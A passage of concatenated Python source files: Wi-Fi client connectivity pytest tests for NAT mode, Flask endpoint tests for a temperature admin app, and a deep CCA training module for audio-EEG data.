if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4530", name="WIFI-4530")
@pytest.mark.twog
@pytest.mark.open
def test_ClientConnectivity_2g_Open_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["open"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = "[BLANK]"
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
setup_params_general_two = {
"mode": "NAT",
"ssid_modes": {
"wpa3_personal": [
{"ssid_name": "ssid_wpa3_p_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa3_p_5g", "appliedRadios": ["5G"],
"security_key": "something"}],
"wpa3_personal_mixed": [
{"ssid_name": "ssid_wpa3_p_m_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa3_p_m_5g", "appliedRadios": ["5G"],
"security_key": "something"}],
"wpa_wpa2_personal_mixed": [
{"ssid_name": "ssid_wpa_wpa2_p_m_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa_wpa2_p_m_5g", "appliedRadios": ["5G"],
"security_key": "something"}]
},
"rf": {},
"radius": False
}
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="NAT Mode Client Connectivity : Suite-B")
@pytest.mark.InteropsuiteB
@allure.feature("NAT MODE CLIENT CONNECTIVITY")
@pytest.mark.parametrize(
'setup_profiles',
[setup_params_general_two],
indirect=True,
scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestNatModeConnectivitySuiteTwo(object):
""" Client Connectivity SuiteB
pytest -m "client_connectivity and nat and InteropsuiteB"
"""
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4539", name="WIFI-4539")
@pytest.mark.wpa3_personal
@pytest.mark.twog
    @allure.story('wpa3 personal 2.4 GHZ Band')
def test_wpa3_personal_2g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4540", name="WIFI-4540")
@pytest.mark.wpa3_personal
@pytest.mark.fiveg
    @allure.story('wpa3 personal 5 GHZ Band')
def test_wpa3_personal_5g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4541", name="WIFI-4541")
@pytest.mark.wpa3_personal_mixed
@pytest.mark.twog
    @allure.story('wpa3 personal mixed 2.4 GHZ Band')
def test_wpa3_personal_mixed_2g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal_mixed"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4542", name="WIFI-4542")
@pytest.mark.wpa3_personal_mixed
@pytest.mark.fiveg
    @allure.story('wpa3 personal mixed 5 GHZ Band')
    def test_wpa3_personal_mixed_5g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal_mixed"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4543", name="WIFI-4543")
@pytest.mark.wpa_wpa2_personal_mixed
@pytest.mark.twog
@allure.story('wpa wpa2 personal mixed 2.4 GHZ Band')
def test_wpa_wpa2_personal_2g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa_wpa2_personal_mixed"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4544", name="WIFI-4544")
@pytest.mark.wpa_wpa2_personal_mixed
@pytest.mark.fiveg
@allure.story('wpa wpa2 personal mixed 5 GHZ Band')
def test_wpa_wpa2_personal_5g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa_wpa2_personal_mixed"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False

# tests/test_views.py (Teddy-Schmitz/temperature_admin, MIT License)
import base64
import json
from models.users import User
from models.event import Event, EventType
import pytest
def test_login_success(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/users', headers=header)
assert resp.status_code == 200
def test_login_failure(test_client, fake_users):
auth_string = base64.b64encode('test_user:fail_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/users', headers=header)
assert resp.status_code == 401
def test_required_login_views(test_client, session):
resp = test_client.get('/users')
assert resp.status_code == 401
resp = test_client.post('/users/test')
assert resp.status_code == 401
resp = test_client.post('/users/create')
assert resp.status_code == 401
resp = test_client.get('/users/delete/test')
assert resp.status_code == 401
resp = test_client.get('/poweron')
assert resp.status_code == 401
resp = test_client.get('/poweroff')
assert resp.status_code == 401
def test_index(test_client):
resp = test_client.get('/')
assert resp.status_code == 200
assert 'Temperature Admin' in resp.data
def test_receive_data_fail(test_client):
resp = test_client.post('/data')
assert resp.status_code == 400
def test_receive_data_success(test_client, fake_temperatures):
resp = test_client.post('/data', content_type='application/json',
data=json.dumps(dict(temperature=45.4, humidity=50.0)))
assert resp.status_code == 201
assert resp.data == 'Created'
def test_receive_event_fail(test_client):
resp = test_client.post('/event')
assert resp.status_code == 400
def test_receive_event_success(test_client, fake_events):
resp = test_client.post('/event', content_type='application/json',
data=json.dumps(dict(event='on', description='test')))
assert resp.status_code == 201
assert resp.data == 'Created'
def test_send_latest_event(test_client, fake_events):
resp = test_client.get('/event/last')
assert resp.status_code == 200
data = json.loads(resp.data)
assert data['results']['timestamp'] == fake_events.timestamp.timestamp
def test_send_events(test_client, fake_events):
resp = test_client.get('/event?range=15')
assert resp.status_code == 200
data = json.loads(resp.data)
assert len(data['results']) == 2
def test_send_data(test_client, fake_temperatures):
resp = test_client.get('/data?range=15')
assert resp.status_code == 200
data = json.loads(resp.data)
assert len(data['results']) == 2
def test_modify_user_success(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.post('/users/test_user', headers=header, data=dict(password='changed_password'))
user = User.query.filter(User.username == 'test_user').first()
assert resp.status_code == 200
assert user.password == 'changed_password'
assert user.username == 'test_user'
def test_modify_user_failure(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.post('/users/bad_user', headers=header, data=dict(password='changed_password'))
user = User.query.filter(User.username == 'test_user').first()
assert resp.status_code == 404
assert user.password == 'test_password'
assert user.username == 'test_user'
def test_delete_user_success(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/users/delete/test_user', headers=header)
user = User.query.filter(User.username == 'test_user').first()
assert resp.status_code == 200
assert user is None
def test_delete_user_failure(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/users/delete/bad_user', headers=header)
user = User.query.filter(User.username == 'test_user').first()
assert resp.status_code == 404
assert user.password == 'test_password'
assert user.username == 'test_user'
def test_create_user_success(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.post('/users/create', headers=header, data=dict(username='test_user2', password='test_password'))
user = User.query.filter(User.username == 'test_user2').first()
assert resp.status_code == 200
assert user is not None
assert user.username == 'test_user2'
assert user.password == 'test_password'
def test_create_user_failure(test_client, fake_users):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.post('/users/create', headers=header, data=dict(username='test_user2'))
user = User.query.filter(User.username == 'test_user2').first()
assert resp.status_code == 400
assert resp.data == 'Error'
assert user is None
@pytest.mark.json_data('{ "return_value": 1}')
def test_power_on(test_client, fake_users, arduino):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/poweron', headers=header)
event = Event.last_event()
assert resp.status_code == 200
assert event.event == EventType.on
@pytest.mark.json_data('{ "return_value": 1}')
def test_power_off(test_client, fake_users, arduino):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/poweroff', headers=header)
event = Event.last_event()
assert resp.status_code == 200
assert event.event == EventType.off
@pytest.mark.json_data('{ "return_value": 0}')
def test_power_on_failure(test_client, fake_users, arduino):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/poweron', headers=header)
event = Event.last_event()
assert resp.status_code == 500
assert event is None
@pytest.mark.json_data('{ "return_value": 0}')
def test_power_off_failure(test_client, fake_users, arduino):
auth_string = base64.b64encode('test_user:test_password')
header = {'Authorization': 'Basic ' + auth_string}
resp = test_client.get('/poweroff', headers=header)
event = Event.last_event()
assert resp.status_code == 500
assert event is None

# deep_models.py (iiscleap/deep-cca-for-audio-EEG, MIT License)
import numpy as np
from os import path
import scipy.io
from pdb import set_trace as bp #################added break point accessor####################
from scipy.signal import lfilter
try: # SciPy >= 0.19
from scipy.special import comb, logsumexp
except ImportError:
from scipy.misc import comb, logsumexp # noqa
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.nn import Parameter
from torch.utils.data import DataLoader
from cca_functions import my_standardize, my_corr
from deep_nets import *
from deep_losses import *
device = torch.device('cuda')
torch.cuda.empty_cache()
# IF GIVEN 10 SEEDS, ALL THE MODELS GET ONE FORWARD PASS AND SEED WITH BEST VALIDATION IS SELECTED
# IF ONLY ONE SEED, THE WEIGHTS ARE INITIALIZED ACCORDINGLY
# TRAIN AND RETURN THE MODEL
# MODEL : model2_13
# LOSS : cca_loss
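# A minimal, framework-free sketch of the seed-selection rule described above
# (an illustration only: nothing in this module calls it). Each candidate seed
# gets one evaluation pass, and the seed whose model scored the highest
# validation correlation is kept, mirroring the argsort over validation
# correlations performed inside dcca_model below.
def _select_best_seed(candidate_seeds, val_correlations):
    import numpy as np  # local import keeps the sketch self-contained
    return int(candidate_seeds[int(np.argmax(val_correlations))])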
def dcca_model(stim_data, resp_data, o_dim, learning_rate=1e-3, use_all_singular_values=False, epoch_num=12, batch_size=2048, reg_par=1e-4, dropout=0.05, best_only=True, path_name="", seeds=np.ceil(np.random.rand(10)*100)):
"""
ARGUMENTS:
stim_data : A THREE ELEMENT LIST OF STIMULI DATA ARRANGED AS: [STIM_TRAINING, STIM_VALIDATION, STIM_TEST]
resp_data : A THREE ELEMENT LIST OF RESPONSE DATA ARRANGED AS: [RESP_TRAINING, RESP_VALIDATION, RESP_TEST]
    o_dim : THE OUTPUT DIMENSION OF EACH NETWORK (NUMBER OF CCA DIMENSIONS)
    learning_rate : LEARNING RATE OF THE MODEL (DEFAULT: 1e-3)
use_all_singular_values : WHETHER THE MODEL SHOULD USE ALL THE SINGULAR VALUES IN THE CCA LOSS (DEFAULT: False)
epoch_num : NUMBER OF EPOCHS OF TRAINING (DEFAULT: 12)
batch_size : MINIBATCH SIZES FOR TRAINING THE MODEL (DEFAULT: 2048)
reg_par : REGULARIZATION PARAMETER FOR WEIGHT DECAY (DEFAULT: 1e-4)
dropout : DROPOUTS PERCENTAGE IN THE MODEL (DEFAULT: 0.05)
best_only : SAVE THE MODEL ONLY WITH THE BEST VALIDATION LOSS (DEFAULT: True)
path_name : WHERE THE MODEL IS TO BE SAVED. (DEFAULT: "")
seeds : SEED FOR THE DEEP MODEL. If given one seed, the model will be initialized with that seed.
    If given more than one seed, the seed with the best validation loss is selected.
RETURNS:
new_data : NEW REPRESENTATIONS AFTER PERFORMING DEEP CCA
correlations : THE TRAINING, VALIDATION AND TEST SET LOSSES WHILE TRAINING THE MODEL - TO TRACK THE MODEL AS TRAINING PROGRESSED.
model : THE TRAINED MODEL.
"""
stimtr = stim_data[0]
stimval = stim_data[1]
stimte = stim_data[2]
resptr = resp_data[0]
respval = resp_data[1]
respte = resp_data[2]
stimtr, mean1, std1 = my_standardize(stimtr)
resptr, mean2, std2 = my_standardize(resptr)
stimval = (stimval - mean1) / std1
stimte = (stimte - mean1) / std1
respval = (respval - mean2) / std2
respte = (respte - mean2) / std2
resp_tr = torch.from_numpy(resptr ).float()
resp_val = torch.from_numpy(respval).float()
resp_te = torch.from_numpy(respte ).float()
    stim_tr = torch.from_numpy(stimtr ).float()
    stim_val = torch.from_numpy(stimval).float()
    stim_te = torch.from_numpy(stimte ).float()
data_tr = torch.cat([resp_tr, stim_tr ], 1)
data_val = torch.cat([resp_val, stim_val], 1)
data_te = torch.cat([resp_te, stim_te ], 1)
i_shape1 = resp_tr.shape[1]
i_shape2 = stim_tr.shape[1]
# best_only = True
act = "sigmoid"
o_act = 'leaky_relu'
    if isinstance(seeds, int):
        seed = seeds
    elif len(seeds) == 1:
        seed = seeds[0]
else:
torch.backends.cudnn.deterministic = True
first_and_last = np.zeros((len(seeds),3))
models = [None] * len(seeds)
print('seeds: ', seeds)
for seed_num, seed in enumerate(seeds) :
torch.manual_seed(seed)
            if torch.cuda.is_available():
                torch.cuda.manual_seed_all(seed)
model = model2_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
print('MODEL : {}'.format(seed_num))
model.eval()
torch.cuda.empty_cache()
            tr_loss = 0
            count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
tr_loss = tr_loss + loss
count = count + 1
del trs
tr_loss = tr_loss / count
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss = cca_loss(val_ops, o_dim, use_all_singular_values)
data_val = data_val.cpu()
torch.cuda.empty_cache()
data_te = data_te.to(device)
test_ops = model(data_te)
test_loss = cca_loss(test_ops, o_dim, use_all_singular_values)
data_te = data_te.cpu()
torch.cuda.empty_cache()
models[seed_num] = model
first_and_last[seed_num] = [-tr_loss, -val_loss, -test_loss]
print('{:0.4f} {:0.4f} {:0.4f}'.format(-tr_loss, -val_loss, -test_loss))
np.set_printoptions(precision=4)
idx = np.argsort(-first_and_last[:,1])
print(first_and_last[idx,1:])
print(seeds[idx])
seed = seeds[idx[0]]
print("seed: ", seed )
torch.manual_seed(seed)
if torch.cuda.is_available() : torch.cuda.manual_seed_all(seed)
model = model2_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
model_state_dict = []
min_loss = 0.00 ; min_loss2 = 0.00
correlations = np.zeros((epoch_num, 3))
for epoch in range(epoch_num): # loop over the dataset multiple times
model.train()
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
for trs in dataloader :
model_optimizer.zero_grad()
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
loss.backward()
model_optimizer.step()
del trs
model.eval()
torch.cuda.empty_cache()
tr_loss = 0
count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
loss = loss.item()
tr_loss = tr_loss + loss
count = count + 1
del trs
correlations[epoch, 0] = -tr_loss / (count)
torch.cuda.empty_cache()
print('EPOCH : {}'.format(epoch))
print(' Training CORRELATION : {:0.4f}'.format(correlations[epoch, 0]))
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss = cca_loss(val_ops, o_dim, use_all_singular_values)
correlations[epoch, 1] = -val_loss
data_val = data_val.cpu()
torch.cuda.empty_cache()
print(' Validation CORRELATION : {:0.4f}'.format(-val_loss))
data_te = data_te.to(device)
test_ops = model(data_te)
test_loss = cca_loss(test_ops, o_dim, use_all_singular_values)
correlations[epoch, 2] = -test_loss
data_te = data_te.cpu()
torch.cuda.empty_cache()
print(' Test CORRELATION : {:0.4f}'.format(-test_loss))
print(" val. loss is : {:0.4f} & the min. loss is : {:0.4f}".format(val_loss, min_loss))
print(" AND since, val_loss < min_loss is {}".format(val_loss < min_loss))
if val_loss < min_loss2:
min_loss2 = val_loss
model_file_name = path_name + '/best_model.pth'
if best_only == True:
if val_loss < min_loss or epoch == 0:
torch.save({
'epoch' : epoch,
'model_state_dict' : model.state_dict(),
'optimizer_state_dict': model_optimizer.state_dict(),
'loss': loss}, model_file_name)
print(' Saved the model at epoch : {}\n'.format(epoch))
min_loss = val_loss
else:
if epoch != 0:
checkpoint = torch.load(model_file_name)
model.load_state_dict(checkpoint['model_state_dict'])
model_optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
best_epoch = checkpoint['epoch']
# loss = checkpoint['loss']
print(' Loaded the model from epoch : {}.\n'.format(best_epoch))
model.train()
model.eval()
data2 = [data_tr, data_val, data_te]
with torch.no_grad():
new_data = []
for k in range(3):
temp = data2[k].to(device)
pred_out = model(temp)
new_data.append([pred_out[0].cpu().numpy(), pred_out[1].cpu().numpy()])
# x1 = new_data[2][0]
# x2 = new_data[2][1]
# result = np.squeeze(my_corr(x1, x2, o_dim))
# print(result)
return new_data, correlations, model
# DMCCA MODEL WITH N RESPS AND 1 STIM
# IF GIVEN 10 SEEDS, ALL THE MODELS GET ONE FORWARD PASS AND SEED WITH BEST VALIDATION IS SELECTED
# IF ONLY ONE SEED, THE WEIGHTS ARE INITIALIZED ACCORDINGLY
# THE MODEL GETS TRAINED AND
# MODEL : dmcca_model_n_resp_1_stim
# LOSS : dmcca_model_loss
# RETURNS : NEW DATA, TRAINING LOSSES, AND THE TRAINED MODEL
def dmcca_model(all_data, o_dim, learning_rate=1e-3, use_all_singular_values=False, epoch_num=12, batch_size=2048, reg_par=1e-4, dropout=0.05, best_only=True, lambda_=0.1, path_name="", mid_shape=60, seeds=np.ceil(np.random.rand(10)*100)):
"""
ARGUMENTS:
all_data : AN (N) ELEMENT LIST OF DATA WITH EACH ELEMENT AS: [DATA_i_TRAINING, DATA_i_VALIDATION, DATA_i_TEST]
ASSUMPTION :
THE FIRST (N-1) ELEMENTS ARE THE (N-1) EEG RESPONSES FOR A COMMON STIMULUS.
THE LAST 1 ELEMENT IS THE COMMON AUDITORY STIMULUS.
learning_rate : LEARNING RATE OF THE MODEL (DEFAULT: 1e-3)
use_all_singular_values : WHETHER THE MODEL SHOULD USE ALL THE SINGULAR VALUES IN THE CCA LOSS (DEFAULT: False)
epoch_num : NUMBER OF EPOCHS OF TRAINING (DEFAULT: 12)
batch_size : MINIBATCH SIZES FOR TRAINING THE MODEL (DEFAULT: 2048)
reg_par : REGULARIZATION PARAMETER FOR WEIGHT DECAY (DEFAULT: 1e-4)
dropout : DROPOUTS PERCENTAGE IN THE MODEL (DEFAULT: 0.05)
best_only : SAVE THE MODEL ONLY WITH THE BEST VALIDATION LOSS (DEFAULT: True)
lambda_ : MSE REGULARIZATION PARAMETER
path_name : WHERE THE MODEL IS TO BE SAVED. (DEFAULT: "")
seeds : SEED FOR THE DEEP MODEL. (DEFAULT: 10 RANDOM SEEDS)
RETURNS:
new_data : NEW REPRESENTATIONS AFTER PERFORMING DEEP CCA
training_losses : THE TRAINING, VALIDATION AND TEST SET LOSSES WHILE TRAINING THE MODEL - TO TRACK THE MODEL AS TRAINING PROGRESSED.
model : THE TRAINED MODEL.
"""
print('Started multiway DCCA.')
# data = [resp1, resp2, ..., respn, stim]
N = len(all_data)
torch.cuda.empty_cache()
data_tr = np.concatenate([i[0] for i in all_data], 1)
data_val = np.concatenate([i[1] for i in all_data], 1)
data_te = np.concatenate([i[2] for i in all_data], 1)
data = [data_tr, data_val, data_te]
i_shape1 = all_data[0][0].shape[1]
i_shape2 = all_data[-1][0].shape[1]
print(i_shape1)
print(i_shape2)
# EACH ONE : T x (R1 + R2 + STIM)
train_set = torch.from_numpy(data_tr).float()
val_set = torch.from_numpy(data_val).float()
te_set = torch.from_numpy(data_te).float()
[data_tr, data_val, data_te] = [train_set, val_set, te_set]
best_only = True
act = "sigmoid"
o_act = 'leaky_relu'
if (isinstance(seeds, int)):
seed = seeds
elif not(isinstance(seeds, int)) and len(seeds) == 1:
seed = seeds[0]
else:
torch.backends.cudnn.deterministic = True
first_and_last = np.zeros((len(seeds),3))
to_append = np.zeros((len(seeds), 3, int(comb(N,2))+1))
models=[None]*len(seeds)
print('seeds: ', seeds)
for seed_num, seed in enumerate(seeds) :
torch.manual_seed(seed)
if torch.cuda.is_available() : torch.cuda.manual_seed_all(seed)
model = dmcca_model_n_resp_1_stim(N-1, i_shape1, i_shape2, mid_shape, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), learning_rate, weight_decay=reg_par)
print('MODEL : {} for seed : {}'.format(seed_num, seed))
model.eval()
torch.cuda.empty_cache()
tr_corr_loss = 0
count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
_, corr_loss, _,neg_corrs,_ = dmcca_model_loss(trs, outputs, i_shape1, o_dim, lambda_, use_all_singular_values)
trs = trs.cpu()
tr_corr_loss = tr_corr_loss + corr_loss
